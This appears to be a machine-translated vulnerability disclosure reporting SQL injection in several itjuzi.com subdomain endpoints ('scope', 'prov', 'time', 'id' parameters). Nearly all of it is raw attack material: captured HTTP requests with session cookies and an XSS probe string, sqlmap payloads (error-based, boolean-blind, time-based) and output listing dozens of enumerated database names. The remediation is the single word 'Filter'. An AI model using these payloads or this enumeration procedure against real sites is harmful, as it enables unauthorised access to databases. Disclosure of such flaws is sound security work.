IT orange multi-site SQL injection 4 (involving a large number of databases)

IT orange multi-site SQL injection 4 (involving a large number of databases)

[HD] building network security with personal glory in the name of a team

 

1.

Data Packets:


 

GET /investevents?scope=1&similar_money=2&sub_scope=75 HTTP/1.1Cookie: cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2218155777735a8bba07cf79b317c7c235%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22218.205.17.171%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435637740%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Deea558e5acc865deaf8a977cb17317b2; BAIDU_DUP_lcr=http://www.acunetix-referrer.com/javascript：domxssExecutionSink(0,"'\">
 
  ()refdxss"); Hm_lvt_1c587ad486cdb6b962e94fc2002edf89=1435637252; Hm_lpvt_1c587ad486cdb6b962e94fc2002edf89=1435637252; _ga=GA1.2.1933942160.1435637253; _gat=1; bd_st=%28%7B%22s%22%3A1435637277874%2C%22r%22%3A%22http%3A//tmp.itjuzi.com/search%3Fcat%3Dcompany%26keyword%3D1%22%7D%29Host: tmp.itjuzi.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
 

The scope parameter and sub_scope parameter can be injected. Here we use scope injection for demonstration.


 

 

Read the permission


 

So many database influences a lot.
 

GET parameter 'scope' is vulnerable. Do you want to keep testing the others (ifany)? [y/N] nsqlmap identified the following injection points with a total of 1730 HTTP(s) requests:---Parameter: scope (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: scope=1) AND (SELECT 8906 FROM(SELECT COUNT(*),CONCAT(0x7176767871,(SELECT (ELT(8906=8906,1))),0x71706b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7451=7451&similar_money=2&sub_scope=75    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (comment)    Payload: scope=1) AND SLEEP(5)#&similar_money=2&sub_scope=75---[12:48:14] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[12:48:14] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 7web application technology: PHP 5.4.13, Nginxback-end DBMS: MySQL 5.0[12:48:14] [INFO] fetching database names[12:48:14] [INFO] the SQL query used returns 32 entries[12:48:14] [INFO] starting 10 threads[12:48:15] [INFO] retrieved: information_schema[12:48:15] [INFO] retrieved: apple_cn[12:48:15] [INFO] retrieved: apple[12:48:15] [INFO] retrieved: bdxzjklt[12:48:15] [INFO] retrieved: avgouzai[12:48:15] [INFO] retrieved: blog_chktips[12:48:15] [INFO] retrieved: dear_there[12:48:15] [INFO] retrieved: blogitjuzi[12:48:15] [INFO] retrieved: cciehunhun[12:48:15] [INFO] retrieved: dengta[12:48:15] [INFO] retrieved: demo_chktips[12:48:15] [INFO] retrieved: dev_yahoo[12:48:15] [INFO] retrieved: itjuzi[12:48:15] [INFO] retrieved: letcodefly[12:48:15] [INFO] retrieved: itjuzidemo[12:48:16] [INFO] retrieved: kejiju[12:48:16] [INFO] retrieved: kids_db[12:48:16] [INFO] retrieved: meximexi[12:48:16] [INFO] retrieved: psdhere[12:48:16] [INFO] retrieved: mysql[12:48:16] [INFO] retrieved: seeker[12:48:16] [INFO] retrieved: redmine[12:48:16] [INFO] retrieved: sochips[12:48:16] [INFO] retrieved: seeker_test[12:48:16] [INFO] retrieved: ssmli[12:48:16] [INFO] retrieved: spider_article[12:48:16] [INFO] retrieved: test[12:48:16] [INFO] retrieved: wp_new[12:48:16] [INFO] retrieved: zangels[12:48:16] [INFO] retrieved: touzishuju[12:48:18] [INFO] retrieved: wp_new_2[12:48:19] [INFO] retrieved: chktipsavailable databases [32]:[*] apple[*] apple_cn[*] avgouzai[*] bdxzjklt[*] blog_chktips[*] blogitjuzi[*] cciehunhun[*] chktips[*] dear_there[*] demo_chktips[*] dengta[*] dev_yahoo[*] information_schema[*] itjuzi[*] itjuzidemo[*] kejiju[*] kids_db[*] letcodefly[*] meximexi[*] mysql[*] psdhere[*] redmine[*] seeker[*] seeker_test[*] sochips[*] spider_article[*] ssmli[*] test[*] touzishuju[*] wp_new[*] wp_new_2[*] zangels[12:48:20] [WARNING] HTTP error codes detected during run:400 (Bad Request) - 2 times, 500 (Internal Server Error) - 1757 times[12:48:20] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tmp.itjuzi.com'

2. Data Packets:


 

GET /invstdeal?prov=1&round=9&similar_money=1 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://car.itjuzi.com:80/Cookie: csrf_cookie_name=8dd969eebfb7bcca1c2ef373d9d77f31; cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2202d64eb824a52f46b03dab17073af0a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2236.250.86.185%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435636782%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Da2768b740c73761818bea540c8499ad6Host: car.itjuzi.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

Prov parameter Injection


 

 

 

GET parameter 'prov' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 880 HTTP(s) requests:---Parameter: prov (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: prov=1'||(SELECT 'vyVA' FROM DUAL WHERE 1321=1321 RLIKE (SELECT (CASE WHEN (1420=1420) THEN 1 ELSE 0x28 END)))||'&round=9&similar_money=1---[13:00:23] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[13:00:23] [INFO] testing MySQL[13:00:24] [INFO] confirming MySQL[13:00:25] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.6.9back-end DBMS: MySQL >= 5.0.0[13:00:25] [INFO] fetching database names[13:00:25] [INFO] fetching number of databases[13:00:25] [INFO] retrieved: 7[13:00:27] [INFO] retrieving the length of query output[13:00:27] [INFO] retrieved: 18[13:01:22] [INFO] retrieved: information_schema[13:01:22] [INFO] retrieving the length of query output[13:01:22] [INFO] retrieved: 10[13:01:38] [INFO] retrieved: _logitjuzi 9/10 (90%)[13:01:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request[13:02:16] [INFO] retrieved: @logitjuzi[13:02:16] [INFO] retrieving the length of query output[13:02:16] [INFO] retrieved: 10[13:02:34] [INFO] retrieved: cacti_prod[13:02:34] [INFO] retrieving the length of query output[13:02:34] [INFO] retrieved: 6[13:02:56] [INFO] retrieved: itjuzi[13:02:56] [INFO] retrieving the length of query output[13:02:56] [INFO] retrieved: 5[13:03:12] [INFO] retrieved: mysql[13:03:12] [INFO] retrieving the length of query output[13:03:12] [INFO] retrieved: 4[13:03:22] [INFO] retrieved: test[13:03:22] [INFO] retrieving the length of query output[13:03:22] [INFO] retrieved: 10[13:03:41] [INFO] retrieved: touzishujuavailable databases [7]:[*] @logitjuzi[*] cacti_prod[*] information_schema[*] itjuzi[*] mysql[*] test[*] touzishuju[13:03:41] [WARNING] HTTP error codes detected during run:400 (Bad Request) - 1 times, 500 (Internal Server Error) - 675 times[13:03:41] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\car.itjuzi.com'

 

 

3. Data Packets:


 

GET /news?time=-1&type=13 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://car.itjuzi.com:80/Cookie: csrf_cookie_name=8dd969eebfb7bcca1c2ef373d9d77f31; cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2202d64eb824a52f46b03dab17073af0a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2236.250.86.185%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435636782%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Da2768b740c73761818bea540c8499ad6Host: car.itjuzi.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

The time parameter can be injected.


 

I will not go into depth here.


 

GET parameter 'time' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 100 HTTP(s) requests:---Parameter: time (GET)    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)    Payload: time=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))WGpt) AND 'tAGM'='tAGM&type=13---[13:11:23] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.6.9back-end DBMS: MySQL 5.0.12[13:11:23] [INFO] fetching database names[13:11:23] [INFO] fetching number of databases[13:11:23] [INFO] retrieved:[13:11:23] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y7[13:11:47] [INFO] retrieved:[13:11:57] [INFO] adjusting time delay to 4 seconds due to good response timesinformatio

4. URL: http://tmp.itjuzi.com: 80/location? Fund_status = 6 & id =-1 & type = com



Parameter id can be injected (32 database root permissions)


 

 

 

 

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: http://tmp.itjuzi.com:80/location?id=-1" OR 3 AND (SELECT 9081 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (ELT(9081=9081,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- dfwk21=6 AND 000507=000507 --    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)    Payload: http://tmp.itjuzi.com:80/location?id=-1" OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))lLua)-- zpXx21=6 AND 000507=000507 -----[13:16:10] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.13, Nginxback-end DBMS: MySQL 5.0[13:16:10] [INFO] fetching database names[13:16:10] [WARNING] reflective value(s) found and filtering out[13:16:10] [INFO] the SQL query used returns 32 entries[13:16:11] [INFO] retrieved: information_schema[13:16:11] [INFO] retrieved: apple[13:16:11] [INFO] retrieved: apple_cn[13:16:12] [INFO] retrieved: avgouzai[13:16:12] [INFO] retrieved: bdxzjklt[13:16:13] [INFO] retrieved: blog_chktips[13:16:13] [INFO] retrieved: blogitjuzi[13:16:13] [INFO] retrieved: cciehunhun[13:16:14] [INFO] retrieved: chktips[13:16:14] [INFO] retrieved: dear_there[13:16:14] [INFO] retrieved: demo_chktips[13:16:15] [INFO] retrieved: dengta[13:16:15] [INFO] retrieved: dev_yahoo[13:16:15] [INFO] retrieved: itjuzi[13:16:16] [INFO] retrieved: itjuzidemo[13:16:16] [INFO] retrieved: kejiju[13:16:16] [INFO] retrieved: kids_db[13:16:17] [INFO] retrieved: letcodefly[13:16:17] [INFO] retrieved: meximexi[13:16:18] [INFO] retrieved: mysql[13:16:18] [INFO] retrieved: psdhere[13:16:18] [INFO] retrieved: redmine[13:16:19] [INFO] retrieved: seeker[13:16:19] [INFO] retrieved: seeker_test[13:16:19] [INFO] retrieved: sochips[13:16:20] [INFO] retrieved: spider_article[13:16:20] [INFO] retrieved: ssmli[13:16:21] [INFO] retrieved: test[13:16:21] [INFO] retrieved: touzishuju[13:16:21] [INFO] retrieved: wp_new[13:16:22] [INFO] retrieved: wp_new_2[13:16:22] [INFO] retrieved: zangelsavailable databases [32]:[*] apple[*] apple_cn[*] avgouzai[*] bdxzjklt[*] blog_chktips[*] blogitjuzi[*] cciehunhun[*] chktips[*] dear_there[*] demo_chktips[*] dengta[*] dev_yahoo[*] information_schema[*] itjuzi[*] itjuzidemo[*] kejiju[*] kids_db[*] letcodefly[*] meximexi[*] mysql[*] psdhere[*] redmine[*] seeker[*] seeker_test[*] sochips[*] spider_article[*] ssmli[*] test[*] touzishuju[*] wp_new[*] wp_new_2[*] zangels[13:16:22] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 35 times[13:16:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tmp.itjuzi.com'

 

Solution:

Filter